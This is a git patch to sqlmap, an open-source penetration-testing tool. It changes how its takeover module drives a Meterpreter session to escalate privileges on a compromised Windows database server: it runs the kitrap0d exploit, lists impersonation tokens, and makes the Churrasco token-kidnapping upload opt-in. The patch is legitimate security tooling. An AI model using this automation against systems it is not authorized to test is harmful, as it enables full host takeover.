From 200518724cf82d64271eb57afb1818d67e4089ec Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Fri, 29 Jan 2010 02:27:50 +0000 Subject: [PATCH] By default do not use Churrasco, but still let the user choose it. The default technique to privilege escalate the OS user to SYSTEM when --priv-esc is provided now it 'run kitrap0d'. --- lib/takeover/metasploit.py | 14 ++++++++------ plugins/generic/takeover.py | 19 ++++++++----------- 2 files changed, 16 insertions(+), 17 deletions(-) diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py index c215e7c6c..a62a78017 100644 --- a/lib/takeover/metasploit.py +++ b/lib/takeover/metasploit.py @@ -443,16 +443,21 @@ class Metasploit: proc.stdin.write("sessions -l\n") proc.stdin.write("sessions -i %s\n" % metSess) - proc.stdin.write("getuid\n") - proc.stdin.write("use espia\n") proc.stdin.write("use incognito\n") proc.stdin.write("use priv\n") proc.stdin.write("use sniffer\n") + proc.stdin.write("sysinfo\n") if conf.privEsc: print + infoMsg = "trying to escalate privileges using " + infoMsg += "kitrap0d script" + logger.info(infoMsg) + + proc.stdin.write("run kitrap0d\n") + infoMsg = "displaying the list of Access Tokens availables. " infoMsg += "Choose which user you want to impersonate by " infoMsg += "using incognito's command 'impersonate_token'" @@ -460,11 +465,8 @@ class Metasploit: proc.stdin.write("list_tokens -u\n") - infoMsg = "trying also to escalate privileges using " - infoMsg += "kitrap0d script" - logger.info(infoMsg) + proc.stdin.write("getuid\n") - proc.stdin.write("run kitrap0d\n") def __controlMsfCmd(self, proc, func): stdin_fd = sys.stdin.fileno() diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py index b2f526673..3ddbe9b95 100644 --- a/plugins/generic/takeover.py +++ b/plugins/generic/takeover.py @@ -61,11 +61,11 @@ class Takeover(Abstraction, Metasploit, Registry): def uploadChurrasco(self): msg = "do you want sqlmap to upload Churrasco and call the " msg += "Metasploit payload stager as its argument so that it " - msg += "will be started as SYSTEM? [Y/n] " + msg += "will be started as SYSTEM? [y/N] " - output = readInput(msg, default="Y") + output = readInput(msg, default="N") - if not output or output[0] in ( "y", "Y" ): + if output and output[0] in ( "y", "Y" ): tmpFile = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_CONTRIB_PATH, "tokenkidnapping", "Churrasco.exe_")) wFile = tmpFile.name @@ -168,18 +168,15 @@ class Takeover(Abstraction, Metasploit, Registry): elif kb.dbms == "PostgreSQL": warnMsg = "by default PostgreSQL on Windows runs as postgres " - warnMsg += "user which has no Windows Impersonation " - warnMsg += "Tokens: it is unlikely that the privilege " - warnMsg += "escalation via 'incognito' extension will " - warnMsg += "be successful" + warnMsg += "user which has no access to LSASS: it is " + warnMsg += "unlikely that the privilege escalation " + warnMsg += "via 'incognito' extension will be successful" logger.warn(warnMsg) elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ): warnMsg = "often Microsoft SQL Server %s " % kb.dbmsVersion[0] - warnMsg += "runs as Network Service which has no Windows " - warnMsg += "Impersonation Tokens within all threads, this " - warnMsg += "makes Meterpreter's 'incognito' extension " - warnMsg += "to fail to list tokens" + warnMsg += "runs as Network Service which has Windows " + warnMsg += "Impersonation Tokens" logger.warn(warnMsg) uploaded = self.uploadChurrasco()